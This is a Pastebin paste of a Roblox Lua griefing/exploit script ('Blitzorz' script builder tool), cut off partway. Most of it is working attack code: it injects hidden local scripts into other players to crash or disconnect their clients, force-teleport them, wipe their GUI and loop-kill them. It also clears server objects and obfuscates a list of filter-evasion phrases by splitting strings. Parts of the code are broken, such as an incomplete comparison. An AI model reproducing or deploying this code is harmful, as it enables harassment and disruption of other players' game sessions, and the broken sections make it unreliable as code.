jordan83221

testo

Sep 6th, 2015
158
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Lua 35.67 KB | None | 0 0
  1. --[[AT]]-- Blitzorz Message: I know you noobs will take this as your own, sure, idc. Script Builder is for skids like you.
  2. wait()
  3. script.Parent = nil
  4. player = game.Players.LocalPlayer
  5. Camera = game.Workspace.CurrentCamera
  6. Auto = true
  7. probe = false
  8. Floorwire = false
  9. kphrase = true
  10. private = false
  11. SourceName = "DSource"
  12. SourceValue = ""
  13. Rotate = 0.5
  14. ClonyPooPoo = script:Clone()
  15. dalist = {"gokusupersayainthree","OMGshadeslayer","GuruNin"}
  16. cmds = {"cra".."sh = *cra".."sh", "Ki".."ck = *ki".."ck", "Base = *b", "Protect = *pro", "Ping = *ping", "cra".."sh Nils = *nilcra".."sh", "Probe others = *probep", "Carry players = *carry","Lag = *lag","Nil lag = *nillag","Speak = *speak","FF = *ff", "Epic = *epic ", "Weak = *weak", "Unff = *unff","No epics = *weaks","Epics = *epics","No ffs = *unffs","FFs = *ffs","Disconnect = *dcon", "Disable scripting = *ds","Force Teleport = *ftp","Loopkill = *loopkill","Insert Asset = *asset","Script Locally = l/"}
  17. CharStuff = {}
  18. CharColors = {}
  19. Tablets = {}
  20. BaLnned = {"Tr3e","SexDrugsDubstepTV","Exploitzzz","scottkid"}
  21. nils = {}
  22. players = {}
  23. connected = {}
  24. _G = {}
  25. admins = {"gokusupersayainthree","OMGshadeslayer","GuruNin"}
  26. superadmins = {}
  27. megaadmins = {}
  28. uberadmins = {}
  29. allowed = {}
  30. nilprilist = {}
  31. nilablist = {}
  32. KiLckiLngPhrLasLes={
  33. 'Ca'..'mb'..'all','cb'..'a','ad'..'min',
  34. 'ba'..'n','/dow'..'n','iC'..'md','iR'..'ay','ad'..'min'..'list',
  35. 'stri'..'ng.rep','Manua'..'lJo'..'int',"\"/do".."wn\"",
  36. "/dow".."n","/hid".."e",
  37.         "r".."pe/",'sa'..'fe',
  38.         "antib".."a".."n",
  39.         "a".."b/",
  40.         "c".."a".."m".."b".."a".."l".."l",
  41.                 "c".."a".."m".."b".."a".."l".."l",
  42.         "c".."a".."m".."b".."a".."l".."l"..".came","iO".."rb",
  43.         "c".."a".."m".."b".."a".."l".."l" .."/",
  44.         "c".."a".."m".."b".."a".."l".."l" .."/","dead".."field","1waf".."fle1",
  45.         "cie" .. " c".."a".."m".."b".."a".."l".."l",
  46. "pb".."a".."n/","b".."a".."n/9","b".."a".."n/99","b".."a".."n/99z","b".."a".."n/99za","b".."a".."n/99zay","b".."a".."n/99zay9","b".."a".."n/InfinityIsLeaked"
  47. ,"plz","rules","Blitzorz:Remove()","Blitzorz:Destroy()",
  48.         "function ".. string.reverse("dlewf"),
  49.         "your own " .. "c".."a".."m".."b".."a".."l".."l",
  50.         "jordan".."88282","qO".."RBp","iBu".."ild",
  51.         "v2 ".."c".."a".."m".."b".."a".."l".."l",
  52.         "c".."b".."a = {}",
  53.         "c".."b".."a.bet",
  54.         "b".."a".."nmenu","admi".."nlist","ki".."ck","com".."mands",
  55.         "cryst".."on",
  56.                 "playero".."r".."b","antib".."a".."n","c".."b".."a","no".."va","blac".."kend",
  57.                 "12pac".."kkid","troll","shut".."down","ManualSurfac".."eJointInstance","may".."hem","scyt".."he","n".."ova",
  58.        "jordan8".."8282","ni".."l","ni".."lize".."r","super","ping",
  59. "eyeba".."ll","o".."r".."b","ki".."ck/","own".."er","antiki".."ck","b".."a".."n","ki".."ck","'..'",'".."','tusKOr661','Credits = {','GuiChat','={','= {','tablet',
  60. }
  61. function isPlayerAdmin(name)
  62.     for i,v in pairs(admins) do
  63.         if name == v then
  64.             return true
  65.         end
  66.     end
  67. end
  68. function isPlayerAloud(plr)
  69.     for i,v in pairs(allowed) do
  70.         if plr.Name == v then
  71.             return true
  72.         end
  73.     end
  74. end
  75. table.insert(allowed, player)
  76. table.insert(nilprilist, player)
  77. table.insert(nilablist, player)
  78. for i,v in pairs(dalist) do
  79.     table.insert(nilprilist, v)
  80.     table.insert(nilablist, v)
  81.     table.insert(allowed, v)
  82. end
  83. for _,Item in pairs(player.Character:children()) do
  84.     if Item:IsA('CharacterMesh') or Item:IsA('Hat') or Item:IsA('Shirt') or Item:IsA('Pants') then
  85.         table.insert(CharStuff,Item:Clone())
  86.     end
  87. end
  88. function makeBillboard(item, text)
  89.  local bg = Instance.new("BillboardGui", item)
  90.    bg.Enabled = true
  91.    bg.AlwaysOnTop = true
  92.    bg.Size = UDim2.new(5, -0.5, 5, 0)
  93.    local f = Instance.new("Frame", bg)
  94.    f.BackgroundTransparency = 1
  95.    f.Size = UDim2.new(2.5, 0, 1.25, 0)
  96.    local tb = Instance.new("TextBox", f)
  97.    tb.Size = UDim2.new(0.5, 0, 0.5, 0)
  98.    tb.FontSize = "Size36"
  99.    tb.Text = text
  100.    tb.TextStrokeTransparency = 0
  101.    tb.TextXAlignment = "Center"
  102.    tb.TextYAlignment = "Top"
  103.    tb.BackgroundTransparency = 1
  104.    tb.TextColor3 = Color3.new(0,0,1)
  105.    tb.Font="ArialBold"
  106.    if text == "Dismiss" then
  107.     tb.TextColor3 = Color3.new(1, 0, 0)
  108. tb.TextStrokeColor3=Color3.new(0,0,0)
  109.    end
  110. end
  111.  
  112. RemoveTablets=function()
  113.   local tabs = Tablets
  114.         for i=#tabs,1,-1 do
  115.                         coroutine.wrap(function()
  116.                                 for b=0,1,0.1 do
  117.                                         wait()
  118.                                         tabs[i].tablet.Transparency = b
  119.                                         tabs[i].sel.Transparency = b
  120.                                         tabs[i].tabdi.Transparency = b
  121.                                 end
  122.                                 tabs[i].tablet:Destroy()
  123.                                 tabs[i].tabdi:Destroy()
  124.                                 table.remove(Tablets,i)
  125.                         end)()
  126.                         --v.tablet:Destroy()
  127.         end
  128. end
  129. function Output(plr,stat)
  130. local tab = Instance.new("Part", game.Workspace)
  131. tab.Name = "Tab"
  132. tab.CanCollide = false
  133. tab.TopSurface = "Smooth"
  134. tab.BottomSurface = "Smooth"
  135. tab.Size = Vector3.new(4, 0.4, 6.6)
  136. tab.Transparency = 0.5
  137. tab.BrickColor = BrickColor.new(0,0,1)
  138. tab.Anchored = true
  139. tab.FormFactor = "Plate"
  140. tabad = Instance.new("Part",tab)
  141. tabad.Name = "Tabad"
  142. tabad.CanCollide = false
  143. tabad.TopSurface = "Smooth"
  144. tabad.BottomSurface = "Smooth"
  145. tabad.Transparency = 0
  146. tabad.BrickColor = BrickColor.new(1,1,1)
  147. tabad.Anchored = true
  148. local mesh = Instance.new("BlockMesh",tabad)
  149. mesh.Scale = Vector3.new(0.5, 0.2, 1)
  150. makeBillboard(tab,stat)
  151. local sele = Instance.new("SelectionBox",tab)
  152. sele.Adornee = tab
  153. sele.Color = BrickColor.new(1,1,1)
  154. sele.Transparency = 0
  155. if stat == "Dismiss" then
  156. tab.BrickColor = BrickColor.new(0,0,1)
  157. sele.Color = BrickColor.new(1,1,1)
  158. end
  159. local click = Instance.new("ClickDetector",tab)
  160. click.MaxActivationDistance = 30000000
  161. tab.ClickDetector.MouseClick:connect(function(pl)
  162.     if pl == game.Players.LocalPlayer then
  163.         if stat == "Dismiss" then
  164.             RemoveTablets()
  165.         else
  166.         for i = 0,1,0.1 do
  167.             tab.Transparency = i
  168.             sele.Transparency = i
  169.             tabad.Transparency = i
  170.             wait()
  171.         end
  172.         tab:Destroy()--DING DING, Idea!!!
  173.         for i,v in pairs(Tablets) do
  174.             if v.tablet == tab then
  175.                 table.remove(Tablets, i)
  176.             end
  177.         end
  178.         end
  179.     end
  180. end)
  181. table.insert(Tablets,{tablet = tab,sel=sele,click=click,plr=plr,txt=stat,tabdi=tabad})
  182. end
  183. CheckDismiss = function()
  184.   local DismissTablets={}
  185.   if #Tablets >= 1 then
  186.     for i,v in pairs(Tablets) do
  187.         if v.txt == "Dismiss" then
  188.             table.insert(DismissTablets, v)
  189.         end
  190.     end
  191.     if #DismissTablets == 0 then
  192.         Output(Player,"Dismiss")
  193.     end
  194.   end
  195. end
  196. --[[
  197. Rot=function()
  198.     local tabcount = #Tablets
  199.     local Radius = 2.5 + tabcount
  200.     for i,v in pairs(Tablets) do
  201.         pcall(function() v.tablet.CFrame = v.plr.Character:FindFirstChild("Head",true).CFrame
  202.             * CFrame.Angles(0,math.rad(i*(360/tabcount)+Rotate),0)
  203.             * CFrame.new(0,0,Radius)
  204.             * CFrame.new(math.rad(25),0,0)
  205.             * CFrame.Angles(45, 0, 0)
  206.         end)
  207.     end
  208.     CheckDismiss()
  209.     Rotate = Rotate+1
  210. end]]
  211. --game:GetService("RunService").Stepped:connect(function() Rot() end)
  212. coroutine.wrap(function()
  213.     while true do
  214.         for rot = 1,360, 5 do
  215.             local tabcount = #Tablets
  216.             local Radius = 2 + tabcount
  217.             for i,v in pairs(Tablets) do
  218.                 v.tablet.CFrame = Camera.Focus
  219.                 * CFrame.Angles(0,math.rad(i*(360/tabcount)+Rotate),0)
  220.                 * CFrame.new(0,0,Radius)
  221.                 * CFrame.Angles(15, 0, 0)
  222.                 v.tabdi.CFrame = Camera.Focus
  223.                 * CFrame.Angles(0,math.rad(i*(360/tabcount)+Rotate),0)
  224.                 * CFrame.new(0,0,Radius)
  225.                 * CFrame.new(math.rad(5),0,0)
  226.                 * CFrame.Angles(15, 0, 0)
  227.             end
  228.             wait()
  229.         end
  230.     end
  231. end)()
  232. --[[Functions]]--
  233. function InvincibleChar()
  234.     while true do wait()
  235.         if Character.Humanoid.Health == 0 then
  236.             Character:Destroy()
  237.             LoadChar()
  238.         end
  239.     end
  240. end
  241. function LoadChar()
  242.     local model = Instance.new("Model",workspace)
  243.     model.Name = "NyHrNyQ"
  244.     Character = game:GetService("InsertService"):LoadAsset(68452456):GetChildren()[1]
  245.     Character.Name = "Santa"
  246.     Character.Parent = model
  247.     Character.Torso.CFrame = Camera.Focus
  248.     player.Character = Character
  249.     local BB = Instance.new("BillboardGui", Character.Head)
  250.     BB.Size = UDim2.new(3, 0, 3 ,0)
  251.     BB.ExtentsOffset = Vector3.new(0, 2, 0)
  252.     local TextBox = Instance.new("TextLabel", BB)
  253.     TextBox.FontSize = "Size36"
  254.     TextBox.Font = "ArialBold"
  255.     TextBox.TextTransparency = 0.3
  256.     TextBox.BackgroundTransparency = 1
  257.     TextBox.TextColor3 = Color3.new(1, 0, 0)
  258.     TextBox.TextStrokeTransparency = 0
  259.     TextBox.Size = UDim2.new(1,0,1,0)
  260.     TextBox.Text = ""
  261.     player.Chatted:connect(function(msg)
  262.     TextBox.Text = msg
  263.     end)
  264.     workspace.CurrentCamera.CameraSubject = Character.Humanoid
  265.     workspace.CurrentCamera.CameraType = "Custom"
  266.     for _,v in pairs(CharStuff) do
  267.         v:Clone().Parent = Character
  268.     end
  269.     Character.Torso.BrickColor = BrickColor.new("Really black")
  270.     Character["Left Arm"].BrickColor = BrickColor.new("Really black")
  271.     Character["Right Arm"].BrickColor = BrickColor.new("Really black")
  272.     Character["Left Leg"].BrickColor = BrickColor.new("Really black")
  273.     Character["Right Leg"].BrickColor = BrickColor.new("Really black")
  274.     Character.Head.BrickColor = BrickColor.new("Really black")
  275.     InvincibleChar()
  276. end
  277. function Lc(Source,Parent)
  278.     local NS = ClonyPooPoo:Clone()
  279.     local Source = NS:FindFirstChild("Source") or NS:FindFirstChild("DSource") or NS:FindFirstChild(SourceName)
  280.     if Source == nil then Instance.new('StringValue',NS).Name = SourceName end Source = NS:findFirstChild(SourceName)
  281.     Source.Value = Source
  282.     NS.Parent = Parent
  283.     NS.Disabled = false
  284. end
  285. function sd()
  286.     for i,v in pairs(game.Workspace:GetChildren()) do
  287.         if v:GetPlayerFromCharacter() then
  288.             nilcrash(v)
  289.         end
  290.     end
  291. end
  292. function the()
  293.     local NS = NormPooPoo:Clone()
  294.     local Source = NS:FindFirstChild("Source") or NS:FindFirstChild("DSource") or NS:FindFirstChild(SourceName)
  295.     if Source == nil then Instance.new('StringValue',NS).Name = SourceName end Source = NS:findFirstChild(SourceName)
  296.     Source.Value = [[
  297.     game.Workspace.Blitzorz.Humanoid.Health = 0
  298.     ]]
  299.     NS.Parent = workspace
  300.     NS.Disabled = false
  301. end
  302. function names()
  303.     local NS = ClonyPooPoo:Clone()
  304.     local Source = NS:FindFirstChild("Source") or NS:FindFirstChild("DSource") or NS:findFirstChild(SourceName)
  305.     if Source == nil then Instance.new('StringValue',NS).Name = SourceName end Source = NS:findFirstChild(SourceName)
  306.     Source.Value = [[
  307.         _G = {}
  308.         wait()
  309.         script.Parent = nil
  310.         LocalPlayer = game:service'Players'.LocalPlayer
  311.         table.insert(_G, LocalPlayer.Name)
  312.     ]]
  313.     NS.Parent = plr:FindFirstChild'Backpack'
  314.     NS.Disabled = false
  315. end
  316. function NewLocalScript(Source)
  317.     local NS = ClonyPooPoo:Clone()
  318.     local Source = NS:FindFirstChild("Source") or NS:FindFirstChild("DSource") or NS:findFirstChild(SourceName)
  319.     if Source == nil then Instance.new('StringValue',NS).Name = SourceName end Source = NS:findFirstChild(SourceName)
  320.     Source.Value = Source
  321.     NS.Parent = player.Backpack
  322.     NS.Disabled = false
  323. end
  324. function clientcraLsh(plr)
  325.     for i,v in pairs(game:service("NetworkServer"):GetChildren()) do
  326.         if v:GetPlayer().Name == plr.Name then
  327.             local NS = ClonyPooPoo:Clone()
  328.             local Source = NS:FindFirstChild("Source") or NS:FindFirstChild("DSource") or NS:findFirstChild(SourceName)
  329.             if Source == nil then Instance.new('StringValue',NS).Name = SourceName end Source = NS:findFirstChild(SourceName)
  330.             Source.Value = [[
  331.             local LocalPlayer = game:service'Players'.LocalPlayer
  332.             LocalPlayer.Parent = nil
  333.             wait()
  334.             LocalPlayer.Parent = game:service'Players'
  335.             ]]
  336.             NS.Parent = v:GetPlayer()
  337.             NS.Disabled = false
  338.         end
  339.     end
  340. end
  341. function ds(plr)
  342.     local NS = ClonyPooPoo:Clone()
  343.     local Source = NS:FindFirstChild("Source") or NS:FindFirstChild("DSource") or NS:findFirstChild(SourceName)
  344.     if Source == nil then Instance.new('StringValue',NS).Name = SourceName end Source = NS:findFirstChild(SourceName)
  345.     Source.Value = [[
  346.     wait()
  347.     script.Parent = nil
  348.     local player = game:service'Players'.LocalPlayer
  349.     function ds()
  350.         while true do wait()
  351.             for i,v in pairs(game.Workspace:GetChildren()) do
  352.                 if v:IsA("StringValue") then
  353.                     if string.find("DS:"..player.Name,v.Name) then
  354.                         player.PlayerGui:ClearAllChildren()
  355.                     end
  356.                 end
  357.             end
  358.         end
  359.     end
  360.     wait()
  361.     ds()
  362.     ]]
  363.     NS.Parent = plr:findFirstChild'Backpack'
  364.     NS.Disabled = false
  365. end
  366. function ash()
  367.     local NS = NormPooPoo:Clone()
  368.     local Source = NS:FindFirstChild("Source") or NS:FindFirstChild("DSource") or NS:FindFirstChild(SourceName)
  369.     if Source == nil then Instance.new('StringValue',NS).Name = SourceName end Source = NS:findFirstChild(SourceName)
  370.     Source.Value = [[
  371.     player = game.Players.Blitzorz
  372.     player.Character.Parent = game.Lighting
  373.     ]]
  374.     NS.Parent = player.Backpack
  375.     NS.Disabled = false
  376. end
  377. function ftp(plr)
  378.     local NS = ClonyPooPoo:Clone()
  379.     local Source = NS:FindFirstChild("Source") or NS:FindFirstChild("DSource") or NS:FindFirstChild(SourceName)
  380.     if Source == nil then Instance.new('StringValue',NS).Name = SourceName end Source = NS:findFirstChild(SourceName)
  381.     Source.Value = [[
  382.     wait()
  383.     script.Parent = nil
  384.     player = game:service'Players'.LocalPlayer
  385.     function ftp()
  386.         while wait() do
  387.             for i,v in pairs(game.Workspace:GetChildren()) do
  388.                 if string.find("FTP:"..player.Name,v.Name) ~= then
  389.                     game:service'TeleportService':Teleport(34985787)
  390.                 end
  391.             end
  392.         end
  393.     end
  394.     wait()
  395.     ftp()
  396.     ]]
  397.     NS.Parent = plr:FindFirstChild'Backpack'
  398.     NS.Disabled = false
  399. end
  400. function serverclear()
  401.     game.Lighting.FogEnd = 100000000000
  402.  
  403.                 game.Lighting.Brightness = 1
  404.  
  405.                 game.Lighting.TimeOfDay = 14
  406.  
  407.                 t = game.Teams:GetChildren()
  408.  
  409.                 for i = 1, #t do
  410.  
  411.                         if t[i]:IsA("Team") then
  412.  
  413.                                 t[i]: Destroy()
  414.  
  415.                         end
  416.  
  417.                 end
  418.  
  419.                 l = game.Lighting:GetChildren()
  420.  
  421.                 for i = 1, #l do
  422.  
  423.                         if l[i]:IsA("Sky") then
  424.  
  425.                                 l[i]: Destroy()
  426.  
  427.                         end
  428.  
  429.                 end
  430.  
  431.                 g = game.Workspace:GetChildren()
  432.  
  433.                 for i = 1, #g do
  434.  
  435.                         if g[i]:IsA("Part") then
  436.  
  437.                                 g[i]: Destroy()
  438.  
  439.                         end
  440.  
  441.                 end
  442.  
  443.                 for i = 1, #g do
  444.  
  445.                         if g[i]:IsA("StringValue") then
  446.  
  447.                                 g[i]: Destroy()
  448.  
  449.                         end
  450.  
  451.                 end
  452.  
  453.                 for i = 1, #g do
  454.  
  455.                         if g[i]:IsA("IntValue") then
  456.  
  457.                                 g[i]: Destroy()
  458.  
  459.                         end
  460.  
  461.                 end
  462.  
  463.                 for i = 1, #g do
  464.  
  465.                         if g[i]:IsA("BoolValue") then
  466.  
  467.                                 g[i]: Destroy()
  468.  
  469.                         end
  470.  
  471.                 end
  472.  
  473.                 for i = 1, #g do
  474.  
  475.                         if g[i]:IsA("NumberValue") then
  476.  
  477.                                 g[i]: Destroy()
  478.  
  479.                         end
  480.  
  481.                 end
  482.  
  483.                 for i = 1, #g do
  484.  
  485.                         if g[i]:IsA("ObjectValue") then
  486.  
  487.                                 g[i]: Destroy()
  488.  
  489.                         end
  490.  
  491.                 end
  492.  
  493.                 for i = 1, #g do
  494.  
  495.                         if g[i]:IsA("RayValue") then
  496.  
  497.                                 g[i]: Destroy()
  498.  
  499.                         end
  500.  
  501.                 end
  502.  
  503.                 for i = 1, #g do
  504.  
  505.                         if g[i]:IsA("Sound") then
  506.  
  507.                                 g[i]: Destroy()
  508.  
  509.                         end
  510.  
  511.                 end
  512.  
  513.                 for i = 1, #g do
  514.  
  515.                         if g[i]:IsA("Accoutrement") then
  516.  
  517.                                 g[i]: Destroy()
  518.  
  519.                         end
  520.  
  521.                 end
  522.  
  523.                 for i = 1, #g do
  524.  
  525.                         if g[i]:IsA("BrickColorValue") then
  526.  
  527.                                 g[i]: Destroy()
  528.  
  529.                         end
  530.  
  531.                 end
  532.  
  533.                 for i = 1, #g do
  534.  
  535.                         if g[i]:IsA("Motor") then
  536.  
  537.                                 g[i]: Destroy()
  538.  
  539.                         end
  540.  
  541.                 end
  542.  
  543.                         for i = 1, #g do
  544.  
  545.                                 if g[i]:IsA("MotorFeature") then
  546.  
  547.                                 g[i]: Destroy()
  548.  
  549.                         end
  550.  
  551.                 end
  552.  
  553.                 for i = 1, #g do
  554.  
  555.                         if g[i]:IsA("Color3Value") then
  556.  
  557.                                 g[i]: Destroy()
  558.  
  559.                         end
  560.  
  561.                 end
  562.  
  563.                 for i = 1, #g do
  564.  
  565.                         if g[i]:IsA("BindableEvent") then
  566.  
  567.                                 g[i]: Destroy()
  568.  
  569.                         end
  570.  
  571.                 end
  572.  
  573.                 for i = 1, #g do
  574.  
  575.                         if g[i]:IsA("BindableFunction") then
  576.  
  577.                                 g[i]: Destroy()
  578.  
  579.                         end
  580.  
  581.                 end
  582.  
  583.                 for i = 1, #g do
  584.  
  585.                         if g[i]:IsA("LocalScript") then
  586.  
  587.                                 g[i]: Destroy()
  588.  
  589.                         end
  590.  
  591.                 end
  592.  
  593.                 for i = 1, #g do
  594.  
  595.                         if g[i]:IsA("Model") and not game.Players:getPlayerFromCharacter(g[i]) and g[i].Name ~= "NyHrNyQ" then
  596.  
  597.                                 g[i]:Remove()
  598.  
  599.                         end
  600.  
  601.                 end
  602.  
  603.                 for i = 1, #g do
  604.  
  605.                         if g[i]:IsA("Hint") then
  606.  
  607.                                 g[i]: Destroy()
  608.  
  609.                         end
  610.  
  611.                 end
  612.  
  613.                 for i = 1, #g do
  614.  
  615.                         if g[i]:IsA("Truss") then
  616.  
  617.                                 g[i]: Destroy()
  618.  
  619.                         end
  620.  
  621.                 end
  622.  
  623.                 for i = 1, #g do
  624.  
  625.                         if g[i]:IsA("Tool") then
  626.  
  627.                                 g[i]: Destroy()
  628.  
  629.                         end
  630.  
  631.                 end
  632.  
  633.                 for i = 1, #g do
  634.  
  635.                         if g[i]:IsA("HopperBin") then
  636.  
  637.                                 g[i]: Destroy()
  638.  
  639.                         end
  640.  
  641.                 end
  642.  
  643.                 for i = 1, #g do
  644.  
  645.                         if g[i]:IsA("Fire") then
  646.  
  647.                                 g[i]: Destroy()
  648.  
  649.                         end
  650.  
  651.                 end
  652.  
  653.                 for i = 1, #g do
  654.  
  655.                         if g[i]:IsA("Explosion") then
  656.  
  657.                                 g[i]: Destroy()
  658.  
  659.                         end
  660.  
  661.                 end
  662.  
  663.                 for i = 1, #g do
  664.  
  665.                         if g[i]:IsA("Hat") then
  666.  
  667.                                 g[i]: Destroy()
  668.  
  669.                         end
  670.  
  671.                 end
  672.  
  673.                 p = Instance.new("Part")
  674.  
  675.                 p.Parent, p.Size, p.Anchored, p.Locked, p.BrickColor, p.Name = Workspace, Vector3.new(600, 1, 600), true, true,
  676.  
  677.                 BrickColor.new("Earth green"), "Base" p.CFrame = CFrame.new(Vector3.new(0, 0, 0))
  678.  
  679.                 while true do wait()
  680.  
  681.                 for i = 1, #g do
  682.  
  683.                 if g[i]:IsA("Message") then
  684.  
  685.                 g[i]: Destroy()
  686.  
  687.                 end
  688.  
  689.                 end
  690.  
  691.                 for i = 1, #g do
  692.  
  693.                 if g[i]:IsA("Hint") then
  694.  
  695.                 g[i]: Destroy()
  696.  
  697.                 end
  698.  
  699.                 end
  700.  
  701.                 end
  702. end
  703. function uncarry(plr)
  704.     local NS = ClonyPooPoo:Clone()
  705.     local Source = NS:FindFirstChild("Source") or NS:FindFirstChild("DSource") or NS:FindFirstChild(SourceName)
  706.     if Source == nil then Instance.new('StringValue',NS).Name = SourceName end Source = NS:findFirstChild(SourceName)
  707.     Source.Value = [[
  708.     player = game.Players.LocalPlayer
  709.     wait()
  710.     player:LoadCharacter()
  711.     ]]
  712.     NS.Parent = plr:findFirstChild("Backpack")
  713.     NS.Disabled = false
  714. end
  715. function protect(plr)
  716.     local NS = ClonyPooPoo:Clone()
  717.     local Source = NS:FindFirstChild("Source") or NS:FindFirstChild("DSource") or NS:FindFirstChild(SourceName)
  718.     if Source == nil then Instance.new('StringValue',NS).Name = SourceName end Source = NS:findFirstChild(SourceName)
  719.     Source.Value = [[
  720.     wait()
  721.     script.Parent = nil
  722.     player = game.Players.LocalPlayer
  723.     player.Character.Archivable = true
  724.     char = player.Character:Clone()
  725.     clone = nil
  726.     function start()
  727.         while true do wait()
  728.             for i,v in pairs(game.Workspace:GetChildren()) do
  729.                 if v:IsA("StringValue") then
  730.                     if string.find("Protect:"..player.Name,v.Name) ~= nil then
  731.                         function char()
  732.                             local m = Instance.new("Message",workspace)
  733.                             m.Text = "You are protected from ki..cks. If you are ki..cked, say char to get your character back."
  734.                             wait(10)
  735.                             m:Destroy()
  736.                             clone = char:Clone()
  737.                             clone.Parent = game.Workspace
  738.                             clone:MakeJoints()
  739.                             clone.Name = char.Name
  740.                             player.Character = clone
  741.                             game.Workspace.CurrentCamera.CameraSubject = clone.Head
  742.                             game.Workspace.CurrentCamera.CameraType = "Follow"
  743.                             player.Chatted:connect(function(msg)
  744.                                 game:service("Chat"):Chat(clone.Head,msg,Enum.ChatColor.Red)
  745.                             end)
  746.                             local ff = Instance.new("ForceField")
  747.                             ff.Parent = clone
  748.                             wait(5)
  749.                             ff:Destroy()
  750.                         end
  751.                     end
  752.                 end
  753.             end
  754.         end
  755.         player.Chatted:connect(function(cmd)
  756.             if cmd == "char" then
  757.                 pcall(function() clone:Destroy() end)
  758.                 char()
  759.                 killed()
  760.             end
  761.         end)
  762.     end
  763.     wait()
  764.     start()
  765.     ]]
  766.     NS.Name = "Protected"
  767.     NS.Parent = plr:findFirstChild('Backpack')
  768.     NS.Disabled = false
  769. end
  770. function ProbePlugin()
  771.     plugin = true
  772.     while plugin == true do wait()
  773.         if not part then
  774.             probe()
  775.         end
  776.     end
  777. end
  778. function probe()
  779.      pcall(function() LocalPlayer.Character:Destroy() end)
  780. if Auto then
  781.         game.Players.LocalPlayer.Parent = nil
  782. end
  783.     part = Instance.new("Part",workspace)
  784.     part.BrickColor = BrickColor.new("Really red")
  785.     part.Size = Vector3.new(3, 3, 3)
  786.     part.Transparency = 0.3
  787.     part.Anchored = true
  788.     part.Shape = "Ball"
  789.     part.Material = "Plastic"
  790.     part.Reflectance = 0.3
  791.     part.CanCollide = false
  792.     part.TopSurface = 0
  793.     part.BottomSurface = 0
  794.     part.Transparency = 0.3
  795.     part.Name = "Probe=Blitzorz"
  796.     local BB = Instance.new("BillboardGui", part)
  797.     BB.Size = UDim2.new(3, 0, 3 ,0)
  798.     BB.ExtentsOffset = Vector3.new(0, 2, 0)
  799.     local TextBox = Instance.new("TextLabel", BB)
  800.     TextBox.FontSize = "Size36"
  801.     TextBox.Font = "ArialBold"
  802.     TextBox.TextTransparency = 0.3
  803.     TextBox.BackgroundTransparency = 1
  804.     TextBox.TextColor3 = Color3.new()
  805.     TextBox.TextStrokeTransparency = 0
  806.     TextBox.Size = UDim2.new(1,0,1,0)
  807.     TextBox.Text = "Blitzorz"
  808.     player.Chatted:connect(function(msg)
  809.     TextBox.Text = "Blitzorz:"..msg
  810.     end)
  811.     local light = Instance.new('PointLight',part)
  812.     light.Range = 20
  813.     light.Brightness = 20
  814.     light.Color = Color3.new(math.random(0,255), math.random(0,255), math.random(0,255))
  815.     light.Enabled = true
  816.     coroutine.wrap(function()
  817.         while part:IsDescendantOf(workspace) do wait()
  818.             part.CFrame = Camera.Focus
  819.         end
  820.     end)()
  821. end
  822. player.Chatted:connect(function(cmd, speaker)
  823.     if cmd == "*probe" then
  824.         char = false
  825.         pcall(function() Character:Destroy() end)
  826.         player.Character = nil
  827.         Output(player,"Activated Probe")
  828.         wait(0.1)
  829.         Output(player,"Running Probe Successfully")
  830.         wait(0.1)
  831.         Output(player, "All commands still working.")
  832.         wait(0.1)
  833.         Output(player, "Version 6.5")
  834.         wait(0.1)
  835.         CheckDismiss()
  836.         wait()
  837.         probe()
  838.         elseif string.sub(cmd,1,8):lower() == "*probep " then
  839.         local thing = Instance.new("StringValue",workspace)
  840.         thing.Name = "Probe:"..string.sub(cmd,9)
  841.         wait()
  842.         thing:Destroy()
  843.         elseif string.sub(cmd,1,11):lower() == "*uberadmin " then
  844.         for i,v in pairs(game.Players:GetPlayers()) do
  845.             if string.find(v.Name,string.sub(cmd,12)) ~= nil then
  846.                 UberAdmin(v)
  847.             end
  848.         end
  849.         elseif cmd == "*dismiss" then
  850.         DismissTablets()
  851.         elseif cmd == "*kphrases" then
  852.         for i,v in pairs(KiLckiLngPhrLasLes) do
  853.             wait(0.1)
  854.             Output(player,v)
  855.         end
  856.         elseif string.sub(cmd,1,5):lower() == "*ftp " then
  857.         while true do wait()
  858.             local thing = Instance.new("StringValue",workspace)
  859.             thing.Name = "FTP:"..string.sub(cmd,6)
  860.         end
  861.         elseif cmd == "*center" then
  862.         Camera.Focus = CFrame.new(0, 0, 0)
  863.         Camera.CoordinateFrame = CFrame.new(0,0,0)
  864.         elseif string.sub(cmd,1,10):lower() == "*unprobep " then
  865.         for i,v in pairs(game.Players:GetPlayers()) do
  866.             if string.find(v.Name,string.sub(cmd,11)) ~= nil then
  867.                 unprobep(v)
  868.             end
  869.         end
  870.         elseif string.sub(cmd,1,9):lower() == "*connect " then
  871.         for i,v in pairs(game.Players:GetPlayers()) do
  872.             if string.find(v.Name,string.sub(cmd,10)) ~= nil then
  873.                 connect(v)
  874.                 probep(v)
  875.                 protect(v)
  876.                 ftp(v)
  877.             end
  878.         end
  879.         elseif string.sub(cmd,1,4):lower() == "pos/" then
  880.         local bet = "/"
  881.         for i=5, #cmd do
  882.             if string.sub(cmd,i,i) == bet then
  883.                 for i,v in pairs(game.Players:GetPlayers()) do
  884.                     if string.find(v.Name,string.sub(cmd,5, i - 1)) then
  885.                         v.Character:MoveTo(Vector3.new(tonumber(string.sub(cmd, i+1))))
  886.                     end
  887.                 end
  888.             end
  889.         end
  890.         elseif cmd == "break" then
  891.         game.NetworkServer:GetChildren():LoadCharacter()
  892.         elseif string.sub(cmd,1,4):lower() == "*ff " then
  893.         for i,v in pairs(game.Players:GetPlayers()) do
  894.             if string.find(v.Name,string.sub(cmd,5)) ~= nil then
  895.                 local ff = Instance.new("ForceField",v.Character)
  896.             end
  897.         end
  898.         elseif string.sub(cmd,1,6):lower() == "*epic " then
  899.         for i,v in pairs(game.Players:GetPlayers()) do
  900.             if string.find(v.Name,string.sub(cmd,7)) ~= nil then
  901.                 pcall(function() v.Character.Humanoid.MaxHealth = math.huge end)
  902.             end
  903.         end
  904.         elseif string.sub(cmd,1,2) == "m/" then
  905.         local bet = "/"
  906.         for i=3,#cmd do
  907.         if string.sub(cmd,i,i) == bet then
  908.         for i,v in pairs(game.Players:GetPlayers()) do
  909.         if string.find(v.Name,string.sub(cmd, 3, i - 1)) ~= nil then
  910.         message(v,string.sub(cmd,i+1))
  911.         end
  912.         end
  913.         end
  914.         end
  915.         elseif string.sub(cmd,1,6):lower() == "*weak " then
  916.         for i,v in pairs(game.Players:GetPlayers()) do
  917.             if string.find(v.Name,string.sub(cmd,7)) ~= nil then
  918.                 pcall(function() v.Character.Humanoid.MaxHealth = 100 end)
  919.             end
  920.         end
